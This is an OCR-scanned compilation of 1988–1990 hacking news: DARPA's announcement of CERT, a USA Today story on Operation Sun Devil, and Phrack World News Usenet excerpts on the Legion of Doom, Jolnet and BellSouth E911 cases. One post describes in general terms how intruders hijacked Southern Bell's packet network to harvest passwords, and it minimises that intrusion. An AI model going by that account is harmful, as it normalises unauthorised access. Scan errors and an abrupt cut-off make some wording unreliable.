IMMEDIATE RELEASE December 6, 1988 (202) 697-5737 
(Public/Industry) 
DARPA ESTABLISHES COMPUTER EMERGENCY RESPONSE TEAM 


The Defense Advanced Research Projects Agency (DARPA) announced today 
that it has established a Computer Emergency Response Team (CERT) to 

address computer security concerns of research users of the Internet, 
which includes ARPANET. The Coordination Center for the CERT is 
1 
U 


ocated at the Software Engineering Institute (SEI), Carnegie Mellon 
niversity, Pittsburgh, PA. 
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In providing direct service to the Internet community, the CERT will 
focus on the special needs of the research community and serve as a 
prototype for similar operations in other computer communities. The 
National Computer Security Center and the National Institute of 
Standards and Technology will have a leading role in coordinating the 
creation of thes mergency response activities. 
The CERT is intended to respond to computer security threats such as 
the recent self-replicating computer program ("computer virus") that 
invaded many defense and research computers. 
The CERT will assist the research network communities in responding to 
emergency situations. It will have the capability to rapidly 
establish communications with experts working to solve the problems, 
with the affected computer users and with government authorities as 
appropriate. Specific responses will be taken in accordance with 
DARPA policies. 
It will also serve as a focal point for the research community for 
identification and repair of security vulnerabilities, informal 
assessment of existing systems in the research community, improvement 
to emergency response capability, and user security awareness. An 
important element of this function is the development of a network of 
key points of contact, including technical experts, site managers, 
government action officers, industry contacts, executive level 
decision-makers and investigative agencies, where appropriate. 
Because of the many network, computer, and systems architectures and 
their associated vulnerabilities, no single organization can be 
expected to maintain an in-hous xpertise to respond on its own to 
computer security threats, particularly those that arise in the 
research community. As with biological viruses, the solutions must 
come from an organized community response of experts. The role of the 
CERT Coordination Center at the SEI is to provide the supporting 
mechanisms and to coordinate the activities of experts in DARPA and 
associated communities. 
The SEI has close ties to the Department of Defense, to defense and 
commercial industry, and to the research community. These ties place 
the SEI in a unique position to provide coordination support to the 
software experts in research laboratories and in industry who will be 
responding in emergencies and to the communities of potentially 
affected users. 
The SEI is a federally-funded research and development center, 
operating under DARPA sponsorship with the Air Force Systems Command 
(Electronic Systems Division) serving as executive agent. Its goal is 
to accelerate the transition of software technology to defense 
systems. Computer security is primarily a software problem, and the 
presence of CERT at the SEI will enhance the technology transfer 
mission of the SEI in security-related areas. 

—END- 


QUESTIONS AND ANSWERS: DARPA ESTABLISHES CERT, 12/6/88 

Q: Can you provide background on earlier break-ins? 

A: On November 2, 1988, thousands of computers connected to 
unclassified DoD computer networks were attacked by a virus. Although 
the virus did not damage or compromise data, it did have the effect of 
denying service to thousands of computer users. The computer science 
research community associated with the Defense Advanced Research 
Projects Agency (DARPA), along with many other research laboratories 
and military sites that use these networks, quickly responded to this 
threat. They developed mechanisms to eliminate the infection, to 
block the spread of the self-replicating program, and to immunize 
against further attack by similar viruses. Software experts from the 
University of California at Berkeley, with important contributions 
from the Massachusetts Institute of Technology and other network 
sites, rapidly analyzed the virus and developed immunization 
techniques. These same software experts also provided important 
assistance in the more recent Internet intrusion of 27-28 November. 
As the events unfolded, DARPA established an ad hoc operation center 
to help coordinate the activities of software experts working around 
the clock and to provide information to appropriate government 
officials. The operations center had three main tasks. It 
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facilitated communications among the many groups affected, it ensured 
that government organizations were promptly informed of developments, 
and it provided initial technical analysis in DoD. Although the 
threat was contained quickly, a more maliciously designed virus could 
have done serious damage. 
The recent events serve aS a warning that our necessarily increasing 
reliance on computers and networks, while providing important new 
capabilities, also creates new kinds of vulnerabilities. The 
Department of Defense considers this an important national issue that 
is of major concern in both the defense and commercial sectors. The 
DoD is developing a technology and policy response that will help 
reduce risk and provide an emergency reaction response. 
Q: Who will be on the CERT? 
A: The CERT will be a team of over 100 experts located throughout the 
U.S. whose expertise and knowledge will be called upon when needed. 
When not being called upon, they will continue their normal daily 
work. As noted in the release, thes xperts will include: technical 
experts, site managers, government action officers, industry contacts, 
xecutive-level decision-makers and representatives from investigative 
agencies. 
recommendations that will be acted upon by DoD authorities. 
Q: Is the CERT fully operational now? 
A: We are in the very early stages of gathering people for the CERT. 
We are first concentrating on collecting technical experts. A staff 
is in place at SEI, but details are still being worked out. 
Q: Will there just be one CERT? 
A: The intent is that each major computer community may decide to 
establish its own CERT. Each CERT will therefore serve only a 
particular community and have a particular technical expertise. (The 
DARPA/SEI CERT will serve, for example, the research community and 
hav xpertise in Berkeley-derived UNIX systems and other systems as 
appropriate.) The National Computer Security Center and the National 
Institute of Standards and Technology will support the establishment 
of the CERTs and coordinate among them. 
Q: What are the special needs of the research community that their 
Cc 
A 


ERT will serve? 

The special challenge of the research community is improving the 
level of computer security without inhibiting the innovation of 
computer technology. In addition, as is often DARPA’s role, their 
CERT will serve as a prototype to explore the CERT concept so that 
other groups can learn and establish their own. 

Q: Does the CERT Coordination Center have a press point of contact? 


A: No. Their function is to serve as a nerve center for the user 
community. 
.end 


USA Today and the devil 


Many controversies have been made of the article printed in USA Today 
after Operation Sun-Devil took it’s toll. 

Phrack inc. tried to contact the author, and with no luck she wasn’t 
accepting phone calls. Please remember, this is only a USA Today article -- 
C’mon, get real USAT. 


byline ’Debbie Howlett, USA Today’ reads: 

A network of computer hackers operating in 14 cities -- which bilked phone 
companies of $50 million -- has been unplugged, police say. 

"We’re not talking about somebody who played Space Invaders too many 
times," says Tim Holtzen, spokesman for the U.S. attorney in Phoenix. 

The hackers the largest such ring discovered in the USA broke into 
phone company and bank computer systems to obtain account numbers and run 
up an unknown total in debts, police say. 

"The main thing is the life-threatening information these computer hackers 
were trying to get into," says Richard Adams of the Secret Service. "It 
goes beyond being monetary to totally mischievous." 

The ring was uncovered 18 months ago, when members tried and failed to 
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infiltrate computers at Barrows Neurological Institute in Phoenix. 

They later tried to block incoming calls to the 911 emergency service in 
Chicago. The motivation? "The primary reason is as kind of a malicious 
hobby." says Gary Chapman of Computer Professionals for Social 
Responsibility. "People are interested in testing their skills against 
security measures." But, Adams says, "I hate to minimize it by saying it 
was just for kicks." 
Police seized 40 computers and 23,000 disks during searches Tuesday in 14 
cities, officials said Wednesday. Five men, between the ages of 19 and 24, 
have been arrested. 

What’s been uncovered so far, says Holtzen, may be "just the tip of the 
iceberg." 


[END OF STORY] 


10.txt Wed Apr 26 09:43:38 2017 1 


==Phrack Inc.== 
Volume Three, Issue Thirty-one, Phile #10 of 10 
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN 


PWN Phrack World News PWN 
PWN Issue XXXI, Part Three PWN 
PWN Compiled by Phreak_Accident PWN 


PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN 


Comp.dcom.telecom 


The following is excerpts from comp.dcom.telecom regard the now "Infamous" 
Legion Of Doom busts. I know most of you have seen some of these 
somewhere-sometime, but I thought I would try to get these out for those 
unfortunate souls that don’t have Usenet access. 

I know there have been many controversies over the following material and 
the busts as a whole -—- Henceforth, Phrack Inc. will not comment on any of such 
busts. Mainly because we don’t want to jeopardize any current investigations 
concerning LOD and others. Leave it alone. It’s old news. Let this sum it up 
for you guys and then forget about it. 


Newsgroups: comp.dcom.telecom 
Subject: CBS News Special Report - "The Busting of The Mentor" 
Message-ID: <4747@accuvax.nwu.edu> 
Date: 5 Mar 90 06:11:49 GMT 
Sender: news@accuvax.nwu.edu 
Organization: Capital Area Central Texas Unix Society, Austin, TX 
Lines: 37 
Approved: Telecom@eecs.nwu.edu 
X-Submissions-To: telecom@eecs.nwu.edu 
X-Administrivia-To: telecom-request@eecs.nwu.edu 
X-Telecom-Digest: Volume 10, Issue 145, Message 6 of 6 
...I’ve just gotten a new update on the Mentor’s recent apprehension by 
the Feds. Thought you might like to hear something as close to as direct 
from the Mentor as possible under the circumstances. 

From: Daneel Olivaw #96 @5283 

Date: Sun Mar 04 19:55:28 1990 
I’1ll have to play the Mentor for now (with permission granted). 
If you haven’t heard the rumors, here is the truth. 
The Mentor was awakened at 6:30am on Thursday (3/1/90) with the gun of 
a Secret Service agent pointed at his head. The SS proceded to search 
and seize for the next 4 1/2 hours. Things taken include an AT with 
80mb HD, HP LaserJet II, various documents, and other thing. They 
then proceeded to raid his office at work, and sieze the computer and 
laser printer there. Lost in the shuffle was a complete novel (being 
written and due in 2 weeks), and various other things. 
Across town: Those of you who know Erik Bloodaxe, he was also 
awakened, and his house searched. 
Neither have been charged with anything, but they expect to at least 
be called as witnesses at the case of the Phrack Boys (Knight 
Lightning and Tarren King) in Chicago April 15. 
Apparently, they did a shoddy job, as they tagged a book that Mentor 
had borrowed from me (Quarterman’s "The Matrix"), and then forgot to 
take it, oh well.... 
It ain’t lookin so lovely. Also the UT computer systes are under 
*VERY* close watch, as they were/are being hacked on by hackers around 
the world, including some in Australia, and England. 


OM 
From: cosell@bbn.com (Bernie Cosell) 
Newsgroups: comp.dcom.telecom 
Subject: Keeping Copies of Illegal Things (was Re: Jolnet, Again) 
Message-ID: <4725@accuvax.nwu.edu> 
Date: 4 Mar 90 04:36:50 GMT 
Sender: news@accuvax.nwu.edu 
Organization: TELECOM Digest 
Lines: 52 
Approved: Telecom@eecs.nwu.edu 
X-Submissions-To: telecom@eecs.nwu.edu 


10.txt Wed Apr 26 09:43:38 2017 2 


X-Administrivia-To: telecom-request@eecs.nwu.edu 
X-Telecom-Digest: Volume 10, Issue 143, Message 3 of 8 
} TELECOM Digest Sat, 3 Mar 90 20:45:00 CST Special: Jolnet, Again 
This isn’t misc.legal, and this isn’t the time to b xcessively picky 
and critical, but: 

}Here is how he told the tale of the ’911 software’: 

}The software showed up on his system one day, almost two years ago. It 
}came to him from netsys, where Len Rose was the sysadmin. According to 
sAndrews, when he saw this file, and realized what it was, he knew the 
}thing to do was to ’get it to the proper authorities as soon as 
}possible’,... 
}ME> "After you passed it along to Boykin, did you then destroy the 
}file and get it off your site?" 

}RA> "Well, no... I kept a copy also." 

It strikes me that this is a KEY faux pas, regardless of good 
intentions or not. 
}But then, said Andrews, a funny thing happened several months later. 
}The folks at AT&T, instead of being grateful for the return of their 
}software came back to Andrews to (in his words) ’ask for it again.’ 
}Somehow, they either never got it the first time; got it but suspected 
}there were still copies of it out; or were just plain confused. 

Just so, and if RA *supplied* another copy, I suspect they’d interpret 
that as pretty convincing evidence that it WAS further distributed, 

and with RA’s knowledge. I know that they didn’t actually contact him 
and ask/tell him to expunge all copies of the stuff, but his actions 
clearly demonstrated his knowledge of just what it was he was messing 
with, and I think they could easily show that he incurred an 

obligation to act prudently with it, or else [just guessing now] he 
could be liable to being an accessory after the fact. 

}So he was contacted by the feds about a year ago, and it was at that 
}point he decided it was in his best interest to cooperate with any 
}investigation going on. 

Perhaps his sudden cooperation was less out of pangs of conscience 

that it might have appeared... [not to besmirch his motives here, 

only to point out that a call from the FBI pointing out that while you 
may not have really DONE anything, your actions _could_ end up landing 
you in court with some serious potential badness going down (and none 
of this untested cheesiness about the the technicalities of bbs’s and 


such... nice mainstream legal liability), could be pretty persuasive 
at converting a concerned, but out-of-the-loop, citizen into an active 
helper]. 

/Bernie\ 


From: dattier@chinet.chi.il.us (David Tamkin) 
Newsgroups: comp.dcom.telecom 
Subject: Seizures Spreading 
Message-ID: <4724@accuvax.nwu.edu> 
Date: 4 Mar 90 05:55:20 GMT 
Sender: news@accuvax.nwu.edu 
Organization: TELECOM Digest 
Lines: 15 
Approved: Telecom@eecs.nwu.edu 
X-Submissions-To: telecom@eecs.nwu.edu 

X-Administrivia-To: telecom-request@eecs.nwu.edu 

X-Telecom-Digest: Volume 10, Issue 143, Message 2 of 8 

News is that Illuminati BBS, a system run by a company named Steve 
Jackson Games somewhere in Texas, was also shut down and its equipment 
seized by the federal government because two suspected Legion of Doom 
members were among its users. 

[Moderator’s Note: And I suspect the raids will continue during the 
next week or two. I wonder which sites will be next? Each place they 
raid, the local crackers point their fingers at each other like 
naughty children, and to make themselves seem like the good guys they 
say, “Have you talked to so-and-so yet?". Let’s see now: netsys, 
jolnet, attctc, illuminati, (your name here?)... Apparently even 
getting rid of incriminating evidence won’t work any longer, if 
someone upstream of you tattled. PT] 

From: mosley@peyote.cactus.org (Bob Mosley IIT) 

Newsgroups: comp.dcom.telecom 
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Subject: Austin, TX BBS Shut Down From Joinet Bust Fallout 
Message-ID: <4723@accuvax.nwu.edu> 
Date: 4 Mar 90 17:22:26 GMT 
Sender: news@accuvax.nwu.edu 
Organization: Capital Area Central Texas Unix Society, Austin, TX 
Lines: 28 
Approved: Telecom@eecs.nwu.edu 
X-Submissions-To: telecom@eecs.nwu.edu 
X-Administrivia-To: telecom-request@eecs.nwu.edu 
X-Telecom-Digest: Volume 10, Issue 143, Message 1 of 8 
This hit most BBS’s in the Austin area on Thursday. It’s believed 
the bust came down Wednesday morning. In a nutshell, here’s what 
happened: 
Wednesday morning, Feb. 28, the offices of Steve Jackson Games, inc., 
were raided by FBI and Secret Service officials. The establishment was 
shit down, and all computer systems, including the Illuminati BBS, 
were confiscated. 
At that time, a ’retired’ member of the LoD, who was identified as 
‘The Mentor’ was arrested. The charges reportedly are related to the 
recent 911 bust that has shut down joinet and attatc (or whatever 
Killerused to be called). His home system was confiscated, complete 
with an entire collection of "Phrack" issues and related paraphanalia. 
As of this writing, the Mentor is reportedly out on bail, sans system 
and network connection. The Illuminati BBS is still down, although SJ 
Games is back in operation, and no charges have been filed against any 
of th mployees other than The Mentor. The systems owned by SJ Games 
have not been returned as of this writing. 
Finally, rumors were trickling in early this morning (Saturday, 3/4) 
that two BBS’s in Dallas, three in Houston, and one in San Antonio 
were busted by the same authorites in relation to the same case. 
[in light of the Mentor’s posted defense of the LoD, I kinda thought 
you’d like to see this one! —- OM] 
From: telecom@eecs.nwu.edu (TELECOM Moderator) 
Newsgroups: comp.dcom.telecom 
Subject: Jolnet, Again 
Message-ID: <4701@accuvax.nwu.edu> 
Date: 4 Mar 90 02:45:00 GMT 
Sender: news@accuvax.nwu.edu 
Organization: TELECOM Digest 
Lines: 350 
Approved: Telecom@eecs.nwu.edu 
X-Submissions-To: telecom@eecs.nwu.edu 
X-Administrivia-To: telecom-request@eecs.nwu.edu 
X-Telecom-Digest: Special: Jolnet, Again 
ELECOM Digest Sat, 3 Mar 90 20:45:00 CST Special: Jolnet, Again 
Today’s Topics: Moderator: Patrick Townson 
Re: AT&T Sourcecode: Poison! (Chip Rosenthal) 
Jolnet Seizure (Mike Riddle) 
Article Regarding JOLNET/e911/LoD/Phrack (Ben Rooney) 
A Conversation With Rich Andrews (TELECOM Moderator) 
Killer/attctc Permanently Down (Charlie Boykin) 


From: Chip Rosenthal <chip@chinacat.lonestar.org> 
Subject: Re: AT&T Sourcecode: Poison! 

Date: 3 Mar 90 00:00:00 GMT 
Organization: Unicom Systems Development, Austin (yay!) 

[Moderator’s Note: Original date of 2/25 changed to prevent prematur 
expiration. PT] 

You’ve got a lot of nerve, Patrick. 

telecom@eecs.nwu.edu (TELECOM Moderator) writes: 

>We’re told by a deep-throat type that AT&T is on the war path about 
>their software [...] Like jolnet, netsys went down abruptly, with 


>*everything* confiscated [...] Now comes news that attcdc [sic], formerly 


>known as killer went off line in a hurry..... 

Yessir, after all your complaints about that about anonymous Legion of 
Doom message, this is a really crummy thing to post. Based upon 
unattributed conversations, you imply that Len Rose and Charlie Boykin 
were involved in wrongdoing which lead to the shutdown of their 
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systems. 

I don’t know Len personally, but have had uucp connections with him in 
the past. Charlie, on the other hand, I do know personally. He is 
very well regarded in the Dallas/Fort Worth area, and was voted "1989 


DFW Administrator of the Year" by the DFW lunch-bunch...errr....DFW 
Association of Unix System Administrators. 
You have cast some crummy aspersions towards these guys. Since I know 


them, I will wait for the facts to come in. Others who don’t know 
them could very well jump to conclusions on the basis of this posting. 
Was this message really called for? 


Chip Rosenthal | Yes, you’re a happy man and you’re 
chip@chinacat.Lonestar.ORG | a lucky man, but are you a smart 
Unicom Systems Development, 512-482-8260 | man? -David Bromberg 


Date: Wed, 28 Feb 90 21:38:39 EST 
From: Mike Riddle <Mike.Riddle@p6.f666.n5010.z1.fidonet.org> 
Subject: Jolnet Seizure 
Reply-to: Mike.Riddle@p6.f666.n285.z1.fidonet.org 
Organization: DRBBS Technical BBS, Omaha, Ne. 402-896-3537 
Has anyone tried a novel legal approach to the case of equipment 
seizure as "evidence"? As I remember the Electronic Communications 
Privacy Act, it contains specific procedures for authorities to obtain 
copies/listings of data on a system (which system may have been used 
for illegal purposes, but whose operator is not at the moment 
charged). From this I think a creative attorney could construct an 
argument that the national policy was not to seiz quipment, merely 
to obtain all the information contained therein. After all, it’s the 
data that caused any harm. 
Also, the Federal Rules of Evidence, and most state rules, provide 
that computer generated copies are "originals" for evidentiary 
purposes. 
I hope that someone close enough to the scene can keep us informed 
about what is happening on this one. 
{standard disclaimer goes her don’t pay any attention to me!} 
--- Ybbat (DRBBS) 8.9 v. 3.07 r.1 
* Origin: [1:285/666.6@fidonet] The Inns of Court, Papillion, NE (285/666.6) 
--- Through FidoNet gateway node 1:16/390 
Mike.Riddle@p6.£666.n5010.z1.fidonet.org 


From: brooney@sirius.uvic.ca 
Date: 3 Mar 90 2:36 -0800 
Subject: Article Regarding JOLNET/e911/LoD/Phrack 
The following is an article I received five days ago which contains, to my 
knowledge, information as yet unpublished in comp.dcom.telecom regarding the 
ongoing JOLNET/e911/LoD discussion. It was printed in a weekly magazine 
with a publishing date of Feb. 27 but other than that I have no exact idea 
of when th vents mentioned herein took place. 

—- Ben Rooney 
MISSOURI STUDENT PLEADS INNOCENT TO 911 CHARGES 

[Knight Lightning], a 19-year-old University of Missouri student, has 
pleaded not guilty to federal allegations that he invaded the 911 
emergency phone network for 9 states. 

As reported earlier, he was indicted this month along with [The Prophet], 
20, of Decatur, Ga. Both are charged with interstate 
transportation of stolen property, wire fraud, and violations of the 
federal Computer Fraud and Abuse Act of 1986. 

Prosecutors contend the two used computers to enter the 911 system of 
Atlanta’s Bell South, then copied the program that controls and 
maintains the system. The stolen material later allegedly was 
published on a computer bulletin board system operating in the Chicago 
suburb of Lockport. Authorities contend Neidorf edited the data for 
an electronic publication known as "Phrack." 

According to Associated Press writer Sarah Nordgren, in a recent 
hearing on the case Assistant U.S. Attorney William Cook was granted a 
motion to prevent the 911 program from becoming part of the public 
record during the trial. U.S. District Judge Nicholas Bua set April 
16 for a trial. 

The 911 system in question controls emergency calls to police, fire, 
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ambulance and emergency services in cities in Alabama, Mississippi, 
Georgia, Tennessee, Kentucky, Louisiana, North Carolina, South 
Carolina and Florida. 


Article from "A Networker’s Journal" by Charles Bowen. 
Info-Mat Magazine (Vol. 6, No. 2) 
[Moderator’s Note: {Info-Mat Magazine}, by the way, is the excellent 
electronic journal distributed on many BBS machines throughout the 
United States who are fortunate enough to be accepted as part of the 
magazine’s distribution network. I personally wish it was distributed 
on Usenet as well: it is well written and very informative. PT] 


Date: Sat, 3 Mar 90 19:34:54 CST 

From: TELECOM Moderator <telecom@eecs.nwu.edu> 

Subject: A Conversation With Rich Andrews 

After the first articles appeared here relating to the seizure of 
Jolnet, and the indictment of some people for their part in the theft 
of '911 software’, I got various messages from other folks in 
response. Some were published, while others were just personal 
correspondence to me. One from Chip Rosenthal was held over, and is 
included in this special issue today. 
One writer, whose comments were attributed to ’Deep Throat’ spent some 
time on two occassions on the phone, in a conference call between 
himself, David Tamkin and myself. 

What was lacking in the several messages which appeared over the past 
week were comments from Rich Andrews, system administrator of Jolnet. 
I got one note from someone in Canada who said Andrews wanted to speak 
with me, and giving a phone number where I could call Andrews at his 
place of employment. 

I put in a call there, with David Tamkin on the other line and had a 
long discussion with Andrews, who was aware of David being on the line 
with me. I asked Andrews if he had any sort of net access available 
to him at all -- even a terminal and modem, plus an account on some 
site which could forward his mail to telecom. You see, I thought, and 
still think it is extremely important to include Rich Andrews in any 
discussion here. 

He assured me he did have an account on a Chicago area machine, and 
that a reply would be forthcoming within hours. I had a second 
conversation with him the next morning, but without David on the line. 
He again told me he would have a response to the several articles 


written in the Digest ready and in the email /’/very soon’. This was on 
Wednesday morning, and we estimated his message would be here sometim 
later in the day -- certainly by midnight or so, when I am typically 


working up an issue of the Digest. 
Midnight came and went with no message. None showed up Thursday or 
Friday. I deliberatly withheld saying anything further in the hopes 
his reply would be here to include at the same time. I guess at this 
point we have to go on without him. 

When David Tamkin and I talked to him the first time, on Tuesday 
evening this past week, the first thing Andrews said to us, after the 
usual opening greetings and chitchat was, 

"I’ve been cooperating with them for over a year now. I assume you 
know that." 

We asked him to define ’them’. His response was that /’/them’ was the 
United States Secret Service, and the Federal Bureau of Investigation. 
He said this without us even asking him if he was doing so. 

We asked him to tell us about the raid on his home early in February. 
e said the agents showed up that Saturday afternoon with a warrant, 
nd took everything away as ’evidence’ to be used in a criminal 
rosecution. 

E> "If you have been working and cooperating with them for this long, 
hy did they take your stuff?" 

A> "They wanted to be sure it would be safe, and that nothing would be 
estroyed." 

E> "But if you wanted to simply keep files safe, you could have taken 
olnet off line for a few weeks/months by unplugging the modems from 
he phone jacks, no? Then, plugged in a line when you wanted to call 
or have a trusted person call you." 


+uk anes Std 
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RA> "They thought it was better to take it all with them. It was mostly 
for appearance sake. They are not charging me with anything." 

ME> "Seems like a funny way to treat a cooperative citizen, at least 
one who is not in some deep mess himself." 

He admitted to us that several crackers had accounts on Jolnet, with 
his knowledge and consent, and that it was all part of the investigation 
going on ... the investigation he was cooperating in. 

Here is how he told the tale of the ’911 software’: 

The software showed up on his system one day, almost two years ago. It 
ame to him from netsys, where Len Rose was the sysadmin. According to 
ndrews, when he saw this file, and realized what it was, he knew the 
hing to do was to ’get it to the proper authorities as soon as 
ossible’, so he chose to do that by transferring it to the machine 
hen known as killer, a/k/a attctc, where Charlie Boykin was the 
ysadmin. 

ndrews said he sent it to Boykin with a request that Boykin pass it 
long to the proper people at AT&T. 

E> "After you passed it along to Boykin, did you then destroy the 

ile and get it off your site?" 

"Well, no... I kept a copy also." 

E> "Did Charlie Boykin pass it along to AT&T as you had requested?" 
"I assume he did." 

then, said Andrews, a funny thing happened several months later. 
he folks at AT&T, instead of being grateful for the return of their 
oftware came back to Andrews to (in his words) ’ask for it again.’ 
omehow, they either never got it the first time; got it but suspected 
here were still copies of it out; or were just plain confused. 

o he was contacted by the feds about a year ago, and it was at that 
oint he decided it was in his best interest to cooperate with any 
nvestigation going on. 

ndrews pointed out that the ’911 software’ was really just "....a 
small part of what this is all about..." He said there was other 
proprietary information going around that should not be circulating. 
He said also the feds were particularly concerned by the large number 
of break-ins on computers which had occurred in the past year or so. 
He said there have been literally "....thousands of attempts to break 
into sites in the past year....", and part of his cooperation with the 
authorities at this time dealt with information on that part of it. 

We asked him about killer/attctc: 

ME> "You knew of course that killer went off line very abruptly about 
a week ago. What caused that? It happened a week or so after the feds 
raided you that Saturday." 

RA> "Well the official reason given by AT&T was lack of funds, but you 
know how that goes...." 

Now you’d think, wouldn’t you, that if it was a funding problem -- if 
you can imagine AT&T not having the loose change in its corporate 
pocket it took to provide electrical power and phone lines to attctc 
(Charlie got no salary for running it) -- that at least an orderly 
transition would have taken place; i.e. an announcement to the net; an 
opportunity to distribute new maps for mail and news distribution, 


cP 
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etc; and some forthcoming shut down date -- let’s say March 1, or 
April 1, or the end of the fiscal year, or something.... 
But oh, no... crash boom, one day it is up, the next day it is gone. 


ME> "What do you know about the temporary suspension of killer some 
time ago? What was that all about?" 
RA> "It was a security thing. AT&T Security was investigating Charlie 
and some of the users then." 
Andrews referred to the previous shutdown of killer as ’a real blunder 
by AT&T’, but it is unclear to me why he feels that way. 
We concluded our conversation by Andrews noting that "there is a lot 
happening out there right now." 

He said the [Phrack] magazine distribution, via netsys, attctc and 
jolnet was under close review. "One way to get them (crackers) is by 
shutting down the sites they use to distribute stuff..." 
And now, dear reader, you know everything I know on the subject. Well, 
almost everything, anyway.... 

From other sources we know that Len Rose of netsys was in deep 
trouble with the law *before* this latest scandal. How deep? Like he 
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was ready to leave the country and go to the other side of the world 
maybe? Like he was in his car driving on the expressway when they 
pulled him over, stopped the car and placed him under arrest? Deep 
enough? This latest thing simply compounded his legal problems. 
Patrick Townson 


Date: Fri Mar 2 06:59:23 1990 
From: Charlie Boykin <cfb@sulaco.sigma.com> 


Subject: Killer/attctc Is Permanently Down 

Hello, 
Regarding a couple of things as well as a message from Bill Huttig. 
The system WAS shut down a couple of years ago - for three weeks - 


as part of a security inquiry. It has been in continous operation 
since. On July 4, 1989, it was moved to a Customer Demonstration 
location at the Dallas Infomart and the node name changed to attctc 
(for AT&T Customer Technology Center). The system was closed down on 
February 20, 1990 after 5 years of operation. There are no charges 
pending and the "management" of the system have been ostensibly 
cleared of any illegal activities. 

As of now, there are no intentions of returning the system to 
service. There are hopeful plans and proposals that could conceivably 
result in the system being placed back in service in a different 
environment and under different management. 

Respectfully, 
Charles F. Boykin 
Formerly sysop\@attctc (killer) 


End of TELECOM Digest Special: Jolnet, Again 
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 


[reprinted without permission from the Feb. 12th, 1990 issue of Telephony] 
ALLEGED HACKERS CHARGED WITH THEFT OF 911 DATA 
Dawn Bushaus, Assistant Editor 

Four alleged computer hackers were indicted last week on charges that they 
schemed to steal and publish proprietary BellSouth Corp. emergency data. The 
alleged activity could have produced disruptions in 911 networks nationwide, 
according to federal officials. 

The case could raise new concerns about the security of local exchange 
carriers’ internal computer networks, which house data records on customers, 
equipment and operations. 

"Security has always been a concern for the telephone companies," said 
Peter Bernstein, an analyst with Probe Research. "If you can crack the 911 
system, what does that say about the operational support system or the billing 
system?" 

A federal grand jury in Chicago handed down two indictments charging 
[The Prophet], 20, of Decatur, Ga., and [Knight Lightning], 19, of 
Chesterfield, Mo., with wire fraud, violations of the 1986 Computer Fraud Act 
and interstate transportation of stolen property. 

Facing similar criminal charges in Atlanta are [The Urvile], 22, and 
[The Leftist], 23. 

The four, alleged to be part of a closely knit group of hackers calling 
themselves the Legion of Doom, reportedly participated in a scheme to steal the 
BellSouth 911 data, valued at $80,000, and publish it in a hacker magazine 
known as "Phrack." 

The Legion of Doom reportedly is known for entering telephone companies’ 
central office switches to reroute calls, stealing computer data and giving 
information about accessing computers to fellow hackers. 

According to the Chicago indictment, XXXXX, also known as "The Prophet," 
stole a copy of the BellSouth 911 program by using a computer outside the 
company to tap into the BellSouth computer. Riggs then allegedly transferred 
the data to a computer bulletin board in Lockport, Ill. 
XXXXXXX, also known as "Knight Lightning," reportedly downloaded the 
information into his computer at the University of Missouri, Columbia, where he 
edited it for publication in the hacker magazine, the indictment said. 

The indictment also charges that the hackers disclosed the stolen 
information about the operation of the enhanced 911 system to other hackers so 
that they could illegally access the system and potentially disrupt or halt 
other systems across the country. 
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The indictments followed a year-long investigation, according to U.S. 
Attorney Ira Raphaelson. If convicted, the alleged hackers face 31 to 32 years 
in prison and $122,000 in fines. 

A BellSouth spokesman said the company’s security system discovered the 
intrusion, which occurred about a year ago, and the company then notified 
federal authorities. 

Hacker invasion in the BellSouth network is very rare, the spokesman said, 
adding that the company favors "stringent laws on the matter." 

The indictment solicited concern about the vulnerability of the public 
network to computer hacking. 


From: MMO2885@swtexas.bitnet 

Newsgroups: comp.dcom.telecom 

Subject: Re: Hacker Group Accused of Scheme Against BellSouth 

Message-ID: <4153@accuvax.nwu.edu> 

Date: 20 Feb 90 11:16:00 GMT 

Sender: news@accuvax.nwu.edu 

Organization: TELECOM Digest 

Lines: 95 

Approved: Telecom@eecs.nwu.edu 

X-Submissions-To: telecom@eecs.nwu.edu 

X-Administrivia-To: telecom-request@eecs.nwu.edu 

X-Telecom-Digest: Volume 10, Issue 118, message 3 of 6 

<<< SYSSANCILLARY: [NOTESSLIBRARY]GENERAL.NOTE;1 >>> 
-< General Discussion >- 


Note 155.6 the MENTOR of the tree tops 6 of 6 
SWT::RRO2026 "Ray Renteria [F LATLINE]" 89 lines 20-FEB-1990 00:18 
< Life, The Universe, & LOD >- 


To set the record straight, a member of LOD who is a student in Austin 
and who has had his computer account at UT subpoenaed by the DA out of 
Chicago because of dealings with the above happenings: 

My name is Chris, but to the computer world, I am Erik Bloodaxe. I 
have been a member of the group known as Legion of Doom since its 
creation, and admittedly I have not been the most legitimate computer 
user around, but when people start hinting at my supposed 
Communist-backed actions, and say that I am involved in a world-wide 
consipracy to destroy the nations computer and/or 911 network, I have 
to speak up and hope that people will take what I have to say 
seriously. 

Frank, Rob and Adam were all definately into really hairy systems. 
They had basically total control of a packet-switched network owned by 
Southern Bell (SBDN)...through this network they had access to every 
computer Southern Bell owned...this ranging from COSMOS terminals up 
to LMOS front ends. Southern Bell had not been smart enough to 
disallow connections from one public pad to another, thus allowing 
anyone who desired to do so, the ability to connect to, and seize 
information from anyone else who was using the network...thus they 
ended up with accounts and passwords to a great deal of systems. 

This was where the 911 system came into play. I don’t know if this 
system actually controlled the whole Southern Bell 911 network, or if 
it was just a site where the software was being developed, as I was 
never on it. In any case, one of the trio ended up pulling files off 
of it for them to look at. This is usually standard proceedure: you 
get on a system, look around for interesting text, buffer it, and 
maybe print it out for posterity. No member of LOD has ever (to my 
knowledge) broken into another system and used any information gained 
from it for personal gain of any kind...with the exception of maybe a 
big boost in his reputation around the underground. Rob took the 
documentation to the system and wrote a file about it. There are 
actually two files, one is an overview, the other is a glossary. (Ray 
has the issue of PHRACK that has the files) The information is hardly 
something anyone could possibly gain anything from except knowledge 
about how a certain aspect of the telephone company works. 


The Legion of Doom used to publish an electronic magazine called the 
LOD Technical Journal. This publication was kind of abandoned due to 
laziness on our part. PHRACK was another publication of this sort, 


sent to several hundred people over the Internet, and distributed 
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widely on bulletin boards around the US. Rob sent the files to PHRACK 
for the information to be read. One of PHRACK’s editors, Craig, 
happened to be the one who received the files. If Rob had sent the 
files to one address higher, Randy would have been the one who would 
probably be in trouble. In anycase, Craig, although he may have 
suspected, really had no way to know that the files were propriatary 
information and were stolen from a Southern Bell computer. 

The three Atlanta people were busted after having voice and data taps 
on their lines for 6 months. The Phrack people were not busted, only 
questioned, and Craig was indicted later. 

What I don’t understand is why Rob and Craig are singled out more 
fe) 

i 

n 

ce 


